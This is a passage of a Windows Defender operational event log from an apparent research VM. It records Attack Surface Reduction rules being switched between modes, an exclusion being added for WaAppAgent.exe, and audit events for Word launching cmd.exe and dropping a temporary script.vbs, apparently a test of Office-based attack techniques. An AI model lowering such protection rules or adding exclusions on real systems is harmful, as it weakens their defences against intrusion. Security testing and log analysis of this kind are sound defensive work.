ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1859 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1858 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1857 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1856 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1855 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1854 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1853 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1852 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x1 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1851 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1850 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1849 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1848 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1847 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1846 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1845 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1844 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1843 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1842 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1841 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1840 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1839 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1838 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1837 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6 11/16/2023 05:34:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1836 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6 11/16/2023 04:39:37 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1833 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\ASROnlyPerRuleExclusions\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = C:\WindowsAzure\Packages\WaAppAgent.exe 11/16/2023 04:38:59 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1832 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\ASROnlyExclusions\C:\WindowsAzure\Packages\WaAppAgent.exe = 0x0 11/16/2023 04:24:09 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1122 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1829 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard audited an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-16T16:24:09.858Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: cmd.exe Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 04:24:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1122 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1828 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard audited an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: 3B576869-A4EC-4529-8536-B80A7769E899 Detection time: 2023-11-16T16:24:01.387Z User: researchvmhaa\research Path: C:\Users\research\AppData\Local\Temp\script.vbs Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1827 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1826 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1825 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1824 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1823 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1822 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1821 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1820 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1819 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1818 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1817 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1816 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa 